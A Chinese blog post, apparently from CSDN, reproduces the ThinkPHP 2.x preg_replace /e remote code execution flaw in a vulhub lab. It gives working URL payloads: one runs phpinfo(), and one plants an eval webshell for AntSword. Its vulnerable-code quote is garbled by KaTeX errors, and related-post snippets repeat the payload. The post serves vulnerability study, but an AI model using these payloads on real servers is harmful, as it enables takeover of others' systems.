ThinkPHP 2.x 任意代码执行漏洞

最新推荐文章于 2024-09-11 12:01:17 发布
最新推荐文章于 2024-09-11 12:01:17 发布
阅读量1.8k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42918771/article/details/107014669
版权

ThinkPHP 2.x 任意代码执行漏洞

漏洞描述

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:
KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲/̲]+)@e', 'var[’\1’]="\2";’, implode( d e p r , depr, depr,paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

环境搭建

搭建链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/2-rce
在这里插入图片描述

漏洞复现

1、使用payload 直接访问,即可执行phpinfo():

http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

在这里插入图片描述

2、利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload:

/index.php?s=a/b/c/${@print(eval($_POST[1]))}

在这里插入图片描述
在这里插入图片描述

参考链接

https://www.freebuf.com/column/223149.html

BeretSEC
关注
专栏目录
复现Thinkphp 2.x 任意代码执行漏洞
记录并分享学习安全的知识点..
07-03 450
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。由于 ThinkPHP 中没有对控制器进行检测,导致在没有开启强制路由的情况下攻击者可以通过此漏洞进行远程命令执行。 ......
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1418
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
ThinkPHP2.2 完整版
01-18
ThinkPHP是一个性能卓越并且功能丰富的轻量级PHP开发框架,本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应用开发更简单、更快速。遵循Apache2开源协议发布,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,2.1版本更是在之前的基础上,经过全新的重构和无数次的完善以及改进,达到了一个新的阶段,足以达到企业级和门户级的开发标准。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用,当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单、快速的特性中受益。简洁、快速和实用是ThinkPHP发展秉承的宗旨,为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践!
ThinkPHP 漏洞复现
最新发布
weixin_74387022的博客
09-11 425
ThinkPHP中,captcha 通常是一个内置的功能,用于生成和验证验证码。同时,也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码在Hackber,POST上传。s=a/a/a/${phpinfo()} ,运行后发现复现成功。在浏览器打开IP+端口8080 , thinkphp路由的格式是分组/模块/操作名/参数。进入2-rce后运行此靶场 docker-compose up -d。运行此靶场 docker-compose up -d。1.对ThinkPHP2--RCE进行漏洞复现。
【vulhub漏洞复现】Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2546
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
Thinkphp2.1爆出重大安全漏洞
weixin_34261739的博客
04-01 561
thinkphp 2.1的版本 我们来分析下漏洞吧 官方发布了一个安全补丁 表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php   125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']...
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...
ThinkPHP 2.x 任意代码执行漏洞【复现】
ximo的博客
03-17 698
ThinkPHP 2.x 任意代码执行漏洞 漏洞描述: ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞漏洞复现 POC:
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp2.1 中文web应用开发框架
11-11
thinkphp2.1 中文web应用开发框架 源码
ThinkPHP2.2 任意代码执行漏洞 利用
weixin_34024034的博客
07-15 500
2019独角兽企业重金招聘Python工程师标准>>> ...
初识thinkphp(2)
qq_38703140的博客
06-05 157
thinkphp的url路径的表示格式为http://ip/tp/public/index.php/模块/控制器/操作这里url最后的操作就是类里面的函数。0x01:url访问格式官方文档中有个驼峰的命名方法比如你实际目录名写的“HelloWorld”,但在解析的时候会成“helloworld”即默认转化为小写。针对这个问题,可以把url写成“../hello_world/”等价于HelloWor...
thinkPHP2
weixin_34162401的博客
05-02 138
视图渲染 display 获取具体内容,并自动输出 $this->display();同名模板 $this->display('showView');showView模板 $this->display('Index:add');index目录下的add模板 $this->display('Admin@Index:add');Admin模块下的Index目录下的add模板...
Thinkphp 2.x rce
qq_53086690的博客
11-23 938
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行
rce php远程命令执行,漏洞复现-2.x rce-Thinkphp远程命令执行
weixin_36328210的博客
03-23 259
漏洞复现-2.x rce-Thinkphp远程命令执行0x00实验环境攻击机:win10靶机:Ubuntu18 (docker搭建的vulhub靶场)0x01实验引用影响Thinkphp 2.x的版本0x02实验目的学习更多的命令执行姿势,同时了解thinkphp 2.x命令执行的原理0x03实验步骤访问页面,发现是一个Thinkphp的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本是2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值